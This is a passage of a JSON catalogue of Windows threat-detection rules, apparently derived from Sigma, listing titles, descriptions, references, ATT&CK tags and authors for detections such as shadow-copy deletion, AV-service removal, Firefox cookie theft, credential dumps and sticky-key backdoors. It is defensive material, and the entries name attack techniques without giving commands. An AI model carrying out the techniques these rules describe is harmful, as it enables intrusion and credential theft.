"refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", - "https://twitter.com/Moriarty_Meng/status/984380793383370752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/10/17", - "filename": "proc_creation_win_run_powershell_script_from_input_stream.yml", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", - "uuid": "bab049ca-7471-4828-9024-38279a4c04da", - "value": "Detect Virtualbox Driver Installation OR Starting Of VMs", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1564/006/", - "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", - "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.006", - "attack.t1564" - ], - "creation_date": "2020/09/26", - "filename": "proc_creation_win_run_virtualbox.yml", - "author": "Janantha Marasinghe", - "level": "low", - "falsepositive": [ - "This may have false positives on hosts where Virtualbox is legitimately being used for operations" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a schtask that 
executes a file from C:\\Users\\\\AppData\\Local", - "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", - "value": "Suspicious Schtasks Execution AppData Folder", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "creation_date": "2022/03/15", - "filename": "proc_creation_win_schtasks_appdata_local_system.yml", - "author": "pH-T, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "uuid": "970823b7-273b-460a-8afc-3a6811998529", - "value": "Uncommon Scheduled Task Once 00:00", - "meta": { - "refs": [ - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml" - ], - "tags": "No established tags", - "creation_date": "2022/07/15", - "filename": "proc_creation_win_schtasks_once_0000.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Software installation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious powershell execution that ends with a common flag instead of a command or a filename to execute (could be a sign of implicit execution that uses files in WindowsApps directory)", - "uuid": "b66474aa-bd92-4333-a16c-298155b120df", - "value": "Suspicious Powershell No File or Command", - "meta": { - "refs": [ - 
"https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "creation_date": "2022/04/08", - "filename": "proc_creation_win_schtasks_powershell_windowsapps_execution.yml", - "author": "pH-T, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", - "value": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "creation_date": "2022/02/12", - "filename": "proc_creation_win_schtasks_reg_loader.yml", - "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936", - "value": "Schtasks Creation Or Modification With SYSTEM Privileges", - "meta": { - "refs": [ - "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", - 
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2022/07/28", - "filename": "proc_creation_win_schtasks_system.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", - "value": "Use of ScreenConnect Remote Access Software", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/02/13", - "filename": "proc_creation_win_screenconnect.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate usage of the tool" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", - "value": "ScreenConnect Backstage Mode Anomaly", - "meta": { - "refs": [ - "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", - "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/02/25", - "filename": "proc_creation_win_screenconnect_anomaly.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - 
"value": "Script Event Consumer Spawning Process", - "meta": { - "refs": [ - "https://redcanary.com/blog/child-processes/", - "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2021/06/21", - "filename": "proc_creation_win_script_event_consumer_spawn.yml", - "author": "Sittikorn S", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when attackers use \"sc.exe\" to delete AV services from the system in order to avoid detection", - "uuid": "7fd4bb39-12d0-45ab-bb36-cebabc73dc7b", - "value": "Suspicious Execution of Sc to Delete AV Services", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/01", - "filename": "proc_creation_win_sc_delete_av_services.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", - "uuid": "57712d7a-679c-4a41-a913-87e7175ae429", - "value": "SC.EXE Query Execution", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1007" - ], - "creation_date": "2021/12/06", - "filename": "proc_creation_win_sc_query.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate query of a service by an administrator to get more information such as the state or PID" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", - "value": "Possible Shim Database Persistence via sdbinst.exe", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_sdbinst_shim_persistence.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for sdclt spawning new processes. 
This could be an indicator of sdclt being used for bypass UAC techniques.", - "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", - "value": "Sdclt Child Processes", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", - "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2020/05/02", - "filename": "proc_creation_win_sdclt_child_process.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of SDelete to erase a file not the free space", - "uuid": "a4824fca-976f-4964-b334-0621379e84c4", - "value": "Sysinternals SDelete Delete File", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdelete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2021/06/03", - "filename": "proc_creation_win_sdelete.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "System administrator usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", - "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", - "value": "Sdiagnhost Calling Suspicious Child Process", - "meta": { - "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", - "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" - ], - "creation_date": "2022/06/01", - "filename": "proc_creation_win_sdiagnhost_susp_child.yml", - "author": "Nextron Systems", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", - "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", - "value": "PPID Spoofing Tool Usage", - "meta": { - "refs": [ - "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", - "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", - "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", - "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1134.004" - ], - "creation_date": "2022/07/23", - "filename": "proc_creation_win_selectmyparent.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects manual service 
execution (start) via system utilities.", - "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", - "value": "Service Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_service_execution.yml", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administrator or user executes a service for legitimate reasons." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a windows service to be stopped", - "uuid": "eb87818d-db5d-49cc-a987-d5da331fbd90", - "value": "Stop Windows Service", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_stop.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ], - "creation_date": "2019/10/23", - "filename": "proc_creation_win_service_stop.yml", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", - "level": "low", - "falsepositive": [ - "Administrator shutting down the service due to upgrade or removal purposes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of executionpolicy option to set insecure policies", - "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", - "value": "Change PowerShell Policies to an Insecure Level", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", - 
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", - "https://adsecurity.org/?p=2604", - "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/11/01", - "filename": "proc_creation_win_set_policies_to_unsecure_level.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrator script" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", - "value": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadowcopy_deletion_via_powershell.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2022/09/20", - "filename": "proc_creation_win_shadowcopy_deletion_via_powershell.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "value": "Shadow 
Copies Access via Symlink", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_access_symlink.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_shadow_copies_access_symlink.yml", - "author": "Teymur Kheirkhabarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administrator working with shadow copies, access for backup purposes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Shadow Copies creation using operating systems utilities, possible credential access", - "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", - "value": "Shadow Copies Creation Using Operating Systems Utilities", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.002", - "attack.t1003.003" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_shadow_copies_creation.yml", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administrator working with shadow copies, access for backup purposes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Shadow Copies deletion using operating systems utilities", - "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "value": "Shadow 
Copies Deletion Using Operating Systems Utilities", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://blog.talosintelligence.com/2017/05/wannacry.html", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", - "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://github.com/Neo23x0/Raccine#the-process", - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", - "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_shadow_copies_deletion.yml", - "author": "Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", - "level": "high", - "falsepositive": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", - "value": "SharpUp PrivEsc Tool", - "meta": { - "refs": [ - "https://github.com/GhostPack/SharpUp", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharpup.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" - ], - "creation_date": "2022/08/20", - "filename": "proc_creation_win_sharpup.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Sharp Chisel via the commandline arguments", - "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", - "value": "SharpChisel Usage", - "meta": { - "refs": [ - "https://github.com/shantanu561993/SharpChisel", - "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ], - "creation_date": "2022/09/05", - "filename": "proc_creation_win_sharp_chisel_usage.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Some false positives may occure with other tools with similar commandlines" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. 
log4j exploitation)", - "uuid": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", - "value": "Shells Spawned by Java", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_by_java.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ], - "creation_date": "2021/12/17", - "filename": "proc_creation_win_shell_spawn_by_java.yml", - "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate calls to system binaries", - "Company specific internal usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious child process of a Windows shell", - "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", - "value": "Windows Shell Spawning Suspicious Program", - "meta": { - "refs": [ - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" - ], - "creation_date": "2018/04/06", - "filename": "proc_creation_win_shell_spawn_susp_program.yml", - "author": "Florian Roth, Tim Shelton", - "level": "high", - "falsepositive": [ - "Administrative scripts", - "Microsoft SCCM" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects SILENTTRINITY stager use", - "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", - "value": "SILENTTRINITY Stager Execution", - "meta": { - "refs": [ - "https://github.com/byt3bl33d3r/SILENTTRINITY", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_silenttrinity_stage_use.yml" - ], - "tags": [ - "attack.command_and_control", - 
"attack.t1071" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_silenttrinity_stage_use.yml", - "author": "Aleksey Potapov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "uuid": "e13f668e-7f95-443d-98d2-1816a7648a7b", - "value": "Detected Windows Software Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", - "https://github.com/harleyQu1nn/AggressorScripts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518" - ], - "creation_date": "2020/10/16", - "filename": "proc_creation_win_software_discovery.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect attacker collecting audio via SoundRecorder application.", - "uuid": "83865853-59aa-449e-9600-74b9d89a6d6e", - "value": "Audio Capture via SoundRecorder", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", - "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ], - "creation_date": "2019/10/24", - "filename": 
"proc_creation_win_soundrec_audio_capture.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate audio capture by legitimate user." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Service Principal Name Enumeration used for Kerberoasting", - "uuid": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", - "value": "Possible SPN Enumeration", - "meta": { - "refs": [ - "https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spn_enum.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ], - "creation_date": "2018/11/14", - "filename": "proc_creation_win_spn_enum.yml", - "author": "Markus Neis, keepwatch", - "level": "medium", - "falsepositive": [ - "Administrator Activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects dump of credentials in VeeamBackup dbo", - "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "value": "VeeamBackup Database Credentials Dump", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ], - "creation_date": "2021/12/20", - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of sqlite binary to query the Firefox cookies.sqlite database and steal the cookie 
data contained within it", - "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", - "value": "SQLite Firefox Cookie DB Access", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_cookies.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1539" - ], - "creation_date": "2022/04/08", - "filename": "proc_creation_win_sqlite_firefox_cookies.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", - "value": "Sticky Key Like Backdoor Usage", - "meta": { - "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" - ], - "creation_date": "2018/03/15", - "filename": "proc_creation_win_stickykey_like_backdoor.yml", - "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without 